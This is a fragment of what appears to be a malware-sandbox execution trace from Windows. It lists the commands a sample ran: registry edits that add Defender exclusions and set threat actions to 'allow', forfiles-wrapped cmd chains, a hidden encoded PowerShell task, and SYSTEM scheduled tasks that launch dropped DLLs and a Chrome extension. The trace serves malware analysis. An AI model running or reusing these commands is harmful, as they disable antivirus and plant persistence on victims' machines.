                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:3688
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:4904
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:1732
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\COkqITLjU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\COkqITLjU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JObHBItpcGleC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JObHBItpcGleC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OFkYfuKVacUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OFkYfuKVacUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RcpQzLwPHZOgYhlmWbR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RcpQzLwPHZOgYhlmWbR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fRaJVJSWwewU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fRaJVJSWwewU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wTVsRuZmkGlUMZVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wTVsRuZmkGlUMZVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\nZzDevEyHlFxxDnlL\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\nZzDevEyHlFxxDnlL\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\yryKlDDJVLpCRzjJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\yryKlDDJVLpCRzjJ\" /t REG_DWORD /d 0 /reg:64;"
                                                      2⤵
                                                      • Drops file in System32 directory
                                                      • System Location Discovery: System Language Discovery
                                                      • Modifies data under HKEY_USERS
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2176
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\COkqITLjU" /t REG_DWORD /d 0 /reg:32
                                                        3⤵
                                                          PID:4200
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\COkqITLjU" /t REG_DWORD /d 0 /reg:32
                                                            4⤵
                                                              PID:2360
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\COkqITLjU" /t REG_DWORD /d 0 /reg:64
                                                            3⤵
                                                              PID:2468
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JObHBItpcGleC" /t REG_DWORD /d 0 /reg:32
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:4996
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JObHBItpcGleC" /t REG_DWORD /d 0 /reg:64
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1676
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFkYfuKVacUn" /t REG_DWORD /d 0 /reg:32
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:4916
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFkYfuKVacUn" /t REG_DWORD /d 0 /reg:64
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2128
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcpQzLwPHZOgYhlmWbR" /t REG_DWORD /d 0 /reg:32
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1132
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcpQzLwPHZOgYhlmWbR" /t REG_DWORD /d 0 /reg:64
                                                              3⤵
                                                                PID:920
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fRaJVJSWwewU2" /t REG_DWORD /d 0 /reg:32
                                                                3⤵
                                                                  PID:2088
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fRaJVJSWwewU2" /t REG_DWORD /d 0 /reg:64
                                                                  3⤵
                                                                    PID:1244
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wTVsRuZmkGlUMZVB /t REG_DWORD /d 0 /reg:32
                                                                    3⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:4924
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wTVsRuZmkGlUMZVB /t REG_DWORD /d 0 /reg:64
                                                                    3⤵
                                                                      PID:2616
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                      3⤵
                                                                        PID:936
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                        3⤵
                                                                          PID:5052
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                          3⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:2348
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                          3⤵
                                                                            PID:392
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\nZzDevEyHlFxxDnlL /t REG_DWORD /d 0 /reg:32
                                                                            3⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:4940
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\nZzDevEyHlFxxDnlL /t REG_DWORD /d 0 /reg:64
                                                                            3⤵
                                                                              PID:996
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\yryKlDDJVLpCRzjJ /t REG_DWORD /d 0 /reg:32
                                                                              3⤵
                                                                                PID:1400
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\yryKlDDJVLpCRzjJ /t REG_DWORD /d 0 /reg:64
                                                                                3⤵
                                                                                  PID:3768
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /CREATE /TN "gGIjqVmxR" /SC once /ST 06:13:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                2⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                PID:4972
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /run /I /tn "gGIjqVmxR"
                                                                                2⤵
                                                                                  PID:2384
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks /DELETE /F /TN "gGIjqVmxR"
                                                                                  2⤵
                                                                                    PID:816
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /CREATE /TN "yDfhldrwGlWiUkcIx" /SC once /ST 11:57:52 /RU "SYSTEM" /TR "\"C:\Windows\Temp\yryKlDDJVLpCRzjJ\OYoaGPjQGJQPoSV\lMxSsZL.exe\" 8Y /ZVPUdidky 385132 /S" /V1 /F
                                                                                    2⤵
                                                                                    • Drops file in Windows directory
                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                    PID:908
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /run /I /tn "yDfhldrwGlWiUkcIx"
                                                                                    2⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:2728
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 1388
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:4996
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                  1⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:1096
                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                    2⤵
                                                                                      PID:1916
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                    1⤵
                                                                                      PID:4556
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                      1⤵
                                                                                        PID:4100
                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                        gpscript.exe /RefreshSystemParam
                                                                                        1⤵
                                                                                          PID:2232
                                                                                        • C:\Windows\Temp\yryKlDDJVLpCRzjJ\OYoaGPjQGJQPoSV\lMxSsZL.exe
                                                                                          C:\Windows\Temp\yryKlDDJVLpCRzjJ\OYoaGPjQGJQPoSV\lMxSsZL.exe 8Y /ZVPUdidky 385132 /S
                                                                                          1⤵
                                                                                          • Checks computer location settings
                                                                                          • Executes dropped EXE
                                                                                          • Drops Chrome extension
                                                                                          • Drops file in System32 directory
                                                                                          • Drops file in Program Files directory
                                                                                          • Modifies data under HKEY_USERS
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:5072
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                            2⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:3352
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                              3⤵
                                                                                              • Indirect Command Execution
                                                                                              PID:1224
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                4⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:4192
                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                  5⤵
                                                                                                    PID:3656
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                3⤵
                                                                                                • Indirect Command Execution
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:2848
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                  4⤵
                                                                                                    PID:5028
                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                      5⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:1668
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                  3⤵
                                                                                                  • Indirect Command Execution
                                                                                                  PID:1704
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                    4⤵
                                                                                                      PID:3112
                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                        5⤵
                                                                                                          PID:3232
                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                      3⤵
                                                                                                      • Indirect Command Execution
                                                                                                      PID:5000
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                        4⤵
                                                                                                          PID:5056
                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                            5⤵
                                                                                                              PID:2376
                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                          3⤵
                                                                                                          • Indirect Command Execution
                                                                                                          PID:2804
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                            4⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:3144
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                              5⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              • Drops file in System32 directory
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:3156
                                                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                6⤵
                                                                                                                  PID:2960
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /DELETE /F /TN "bcCGPajShxGMlZQUJS"
                                                                                                          2⤵
                                                                                                            PID:2476
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                            2⤵
                                                                                                              PID:4700
                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                3⤵
                                                                                                                • Indirect Command Execution
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:2180
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                  4⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:3136
                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                    5⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Drops file in System32 directory
                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1584
                                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                      6⤵
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:248
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\COkqITLjU\EGhCbp.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "fvhMoXYTjforzzT" /V1 /F
                                                                                                              2⤵
                                                                                                              • Drops file in Windows directory
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                              PID:2596
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /CREATE /TN "fvhMoXYTjforzzT2" /F /xml "C:\Program Files (x86)\COkqITLjU\JswWTIN.xml" /RU "SYSTEM"
                                                                                                              2⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                              PID:3236
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /END /TN "fvhMoXYTjforzzT"
                                                                                                              2⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:2336
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /DELETE /F /TN "fvhMoXYTjforzzT"
                                                                                                              2⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:3192
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /CREATE /TN "KOUxHKtLWmQusY" /F /xml "C:\Program Files (x86)\fRaJVJSWwewU2\ULVIsXg.xml" /RU "SYSTEM"
                                                                                                              2⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                              PID:4020
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /CREATE /TN "pNkouUgxJvHwd2" /F /xml "C:\ProgramData\wTVsRuZmkGlUMZVB\WCpzmpy.xml" /RU "SYSTEM"
                                                                                                              2⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                              PID:4860
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /CREATE /TN "DzewYbfCbqdMiHTlz2" /F /xml "C:\Program Files (x86)\RcpQzLwPHZOgYhlmWbR\FGgmsBz.xml" /RU "SYSTEM"
                                                                                                              2⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                              PID:5052
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /CREATE /TN "fpGcAwSIrMdFmUtmmlf2" /F /xml "C:\Program Files (x86)\JObHBItpcGleC\QBbmrDA.xml" /RU "SYSTEM"
                                                                                                              2⤵
                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                              PID:2176
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /CREATE /TN "NjBIbsaDplWhxmNVa" /SC once /ST 12:59:00 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\yryKlDDJVLpCRzjJ\tyCUNsdu\amsjgSY.dll\",#1 /mVWLdidl 385132" /V1 /F
                                                                                                              2⤵
                                                                                                              • Drops file in Windows directory
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                              PID:3092
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /run /I /tn "NjBIbsaDplWhxmNVa"
                                                                                                              2⤵
                                                                                                                PID:3436
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /DELETE /F /TN "yDfhldrwGlWiUkcIx"
                                                                                                                2⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:1720
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5072 -s 2544
                                                                                                                2⤵
                                                                                                                • Program crash
                                                                                                                PID:3936
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3440 -ip 3440
                                                                                                              1⤵
                                                                                                                PID:3312
                                                                                                              • C:\Windows\system32\rundll32.EXE
                                                                                                                C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\yryKlDDJVLpCRzjJ\tyCUNsdu\amsjgSY.dll",#1 /mVWLdidl 385132
                                                                                                                1⤵
                                                                                                                  PID:2476
                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\yryKlDDJVLpCRzjJ\tyCUNsdu\amsjgSY.dll",#1 /mVWLdidl 385132
                                                                                                                    2⤵
                                                                                                                    • Blocklisted process makes network request
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Loads dropped DLL
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Enumerates system info in registry
                                                                                                                    PID:2816
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      schtasks /DELETE /F /TN "NjBIbsaDplWhxmNVa"
                                                                                                                      3⤵
                                                                                                                        PID:404
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
